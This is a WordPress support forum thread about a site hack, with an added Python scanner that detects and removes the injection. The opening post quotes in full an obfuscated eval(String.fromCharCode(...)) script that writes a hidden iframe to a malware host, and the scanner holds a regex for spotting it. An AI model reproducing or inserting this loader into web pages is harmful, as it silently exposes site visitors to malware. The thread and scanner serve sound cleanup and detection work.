Hacked (13 posts)

  1. retrovision
    Member
    Posted 5 years ago #

    <script type="text/javascript">eval(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,61,34,115,105,34,59,118,97,114,32,119,51,52,53,61,34,112,108,34,59,118,97,114,32,114,101,54,61,34,97,110,107,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,102,103,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,39,43,39,105,115,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>

    Keeps ending up appended to all the PHP and HTML files in the directory where my WordPress blog is hosted.

    I found some links that describe the same problem:

    http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/#more-432
    http://wordpress.org/support/topic/255476?replies=3#post-1025429

    I noticed this hack a couple of days ago and cleaned all of the affected files, changed the files to read only and changed the passwords on everything. I did it again today.

    This causes Google Chrome to give a "hacked" error:

    Warning: Visiting this site may harm your computer!

    The website at retrovision.tv contains elements from the site siplank.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
    For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for siplank.com.

  2. djmom70
    Member
    Posted 5 years ago #

    I have this same problem and don't know how to fix it. :(

  3. djmom70
    Member
    Posted 5 years ago #

    Also wanted to point out that it is happening to me in Safari, but not Firefox.

    My blog is password protected, but I don't know how to fix it.

  4. whooami
    Member
    Posted 5 years ago #

    You do NOT sound like you are having the same problem as the original poster.

    What makes you believe otherwise? I suspect you may need to re-read that post and perhaps start your own thread?

  5. djmom70
    Member
    Posted 5 years ago #

    Email me at djmom70 {at} cox {dot} net please.

  6. djmom70
    Member
    Posted 5 years ago #

    I get the exact same error as the previous poster does. Also followed the links he provided and saw that I have the same problem with that long string of script.

    The error does not pop up for me in Firefox, but it does in Safari.

    I've spent the last 3 hours trying to figure this out, so I'm pretty sure I'm having the same problem.

    Thank you.

  7. whooami
    Member
    Posted 5 years ago #

    I'm emailing you for the URL.

  8. djmom70
    Member
    Posted 5 years ago #

    Just emailed you back.

  9. someday
    Member
    Posted 5 years ago #

    What themes do you use?

  10. djmom70
    Member
    Posted 5 years ago #

    I'm using althuapa, but it happened even when I switched themes.

    For anyone else having this problem, whooami is a great help! I found out that all of my index.htm and index.php had been changed at the same time on the same day and sure enough it had that long code that was in this opening post. I changed all my passwords and removed the bad code. Hopefully all will be well now. I hope this helps anyone else with this issue.

  11. birdtree
    Member
    Posted 5 years ago #

    Hi, I am having the same problem with my site. The attackers have been back at least twice. We are cleaning up the files now.

  12. mnistor1
    Member
    Posted 5 years ago #

    Hello,

    I think I'm having a similar problem. Yesterday my site started spitting out the dreaded 'Visiting this site may harm your computer' so I did a search through all the files for the JavaScript mentioned above to no avail. I then found on the diagnostic page a reference to:
    '2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including feed2js.org/, feeds.feedburner.com/~s/.'

    Which are components of two different legitimate scripts that I have running for FeedBurner obviously. The weird thing is, I've had these running for a few months and never had any problems. So I just removed them and then requested Google to review my site after I've removed the problem. Is this all I need to do and just wait for Google to get around to reviewing my site? If so, doesn't this seem odd that Google polices the internet? Anyone know how long it might take Google to take down this message?

    Site I'm referencing is http://www.vintageglamblog.com

    Any help is appreciated!

    Matt

  13. snapiweb
    Member
    Posted 4 years ago #

    Check your header.php and footer.php in your current theme;
    you'll see some script code in there with what looks like just scrambled letters and numbers.
    Delete this and the script tags around it.

    Then go through and look at all other files to see if you can find other instances of it.
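
The check described in the thread (the `eval(String.fromCharCode(...))` block from the opening post, and the advice in the last post to look through every file for it), as an added example that is not part of any post here. It decodes the character codes statically, never executing them, and reports each affected file with its modification time; the function names, the scanned suffixes and the sample input are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# Matches the injected block: <script ...>eval(String.fromCharCode(n,n,...))</script>
INJECT_RE = re.compile(
    r"<script[^>]*>\s*eval\(String\.fromCharCode\(([\d,\s]+)\)\)\s*;?\s*</script>",
    re.IGNORECASE,
)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}  # assumed set of file types

def decode_charcodes(arg_list):
    """Turn '118,97,114' into text without ever executing it."""
    return "".join(chr(int(n)) for n in arg_list.split(",") if n.strip())

def find_injections(text):
    """Return the decoded JavaScript of every injected block in text."""
    return [decode_charcodes(m.group(1)) for m in INJECT_RE.finditer(text)]

def strip_injections(text):
    """Remove the injected blocks, script tags included."""
    return INJECT_RE.sub("", text)

def scan_tree(root):
    """Map each infected file under root to (mtime, decoded payloads)."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            found = find_injections(text)
            if found:
                hits[str(path)] = (path.stat().st_mtime, found)
    return hits

# Constructed sample: a theme footer with a harmless stand-in payload appended.
# Its char codes spell: document.write("x.example")
SAMPLE = (
    "<?php wp_footer(); ?>\n</body>\n</html>\n"
    '<script type="text/javascript">eval(String.fromCharCode('
    + ",".join(str(ord(c)) for c in 'document.write("x.example")')
    + "))</script>\n"
)

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, (mtime, payloads) in sorted(scan_tree(root).items()):
        print(name, int(mtime), payloads)
```

Decoding the opening post's payload this way shows a hidden iframe whose source host is assembled from short string variables, so a plain text search for the flagged domain finds nothing and the `eval(String.fromCharCode(` wrapper is the pattern to match. Files that report the same modification time were likely rewritten in one pass, which is what post 10 observed.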

Topic Closed

This topic has been closed to new replies.
